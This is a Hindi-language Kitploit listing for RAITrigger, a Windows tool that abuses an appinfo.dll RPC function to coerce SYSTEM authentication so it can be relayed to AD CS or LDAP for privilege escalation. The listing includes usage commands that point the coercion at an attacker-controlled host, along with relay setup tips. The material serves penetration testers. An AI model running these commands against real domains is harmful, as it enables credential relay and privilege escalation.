Skip to content
KitploitKITPLOIT
उपकरणएक्सप्लॉइटब्लॉग
Log in
जमा करें
उपकरणएक्सप्लॉइटब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
RAITrigger — रिले करने के लिए स्थानीय SYSTEM प्रमाणीकरण ट्रिगर | Kitploit
उपकरण/GitHubGitHub/rteccybersec/raitrigger
विशेषाधिकार वृद्धिशोषणपार्श्व आंदोलनप्रमाणीकरणरेड टीमिंग
GitHubrteccybersec/raitrigger

RAITrigger

रिले करने के लिए स्थानीय SYSTEM प्रमाणीकरण ट्रिगर

रिपॉजिटरी देखें
17325111 साल पहलेKitploit द्वारा समीक्षित

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

RAITrigger

RPC-फंक्शन appinfo.dll लाइब्रेरी का RAiForceElevationPromptForCOM SYSTEM को मजबूर करने की अनुमति देता है। यह केवल डोमेन से जुड़े सिस्टम पर काम करता है। यह पता चला है कि इस फंक्शन को किसी भी निम्न विशेषाधिकार वाले उपयोगकर्ता द्वारा कॉल किया जा सकता है (प्रक्रिया शुरू करने के लिए नहीं) बल्कि किसी मनमाने स्थान पर SYSTEM प्रमाणीकरण को ट्रिगर करने के लिए। ऐसा इसलिए है क्योंकि CreateFileW को पहले इनपुट पैरामीटर के स्थान पर SYSTEM के रूप में कॉल किया जाता है:



चूंकि निम्न विशेषाधिकार वाला उपयोगकर्ता अभी भी प्रतिरूपित है, इसलिए इसे SEImpersonate से SYSTEM तक विशेषाधिकार बढ़ाने के लिए पोटैटो ट्रिगर के रूप में उपयोग नहीं किया जा सकता है:



लेकिन इसका उपयोग ADCS के विरुद्ध कंप्यूटर खाता प्रमाणपत्र का अनुरोध करने के लिए किया जा सकता है जब आने वाले SMB प्रमाणीकरण के साथ वेब एनरोलमेंट सक्षम हो। या इसका उपयोग LDAP पर रिले करने के साथ LPE के लिए किया जा सकता है - जब LDAP साइनिंग सक्षम न हो।

SMB प्रमाणीकरण ट्रिगर करने के लिए:

[*] RAITrigger.exe \\attackerip\test\test.exe

HTTP प्रमाणीकरण ट्रिगर करने के लिए (WebClient सेवा सक्षम होनी चाहिए):

[*] RAITrigger.exe \\hostname@80\test\test.exe

HTTP प्रमाणीकरण केवल विश्वसनीय इंट्रानेट ज़ोन सिस्टम पर ट्रिगर होता है, इसलिए आपको अपने Kali IP के लिए एक ADIDNS रिकॉर्ड बनाना होगा या उसी सबनेट में होना होगा और उदा. Responder का उपयोग करना होगा। पूर्ण FQDN का उपयोग कभी न करें, केवल होस्टनाम का उपयोग करें।

रिमोट से (स्थानीय व्यवस्थापक के साथ भी) इस फंक्शन को कॉल करने पर rpc_access_denied मिलता है, इसलिए यह उदा. PetitPotam या इसी तरह का कोई विकल्प नहीं है:



सुधार की गुंजाइश

  • NtApiDotNet लाइब्रेरी बहुत बड़ी है। MIDL बाइट्स का उपयोग करके असेंबली के आकार को SharpSystemTriggers के समान काफी कम किया जा सकता है।

क्रेडिट्स

  • https://github.com/warpnet/MS-RPC-Fuzzer
टूल डाउनलोड करें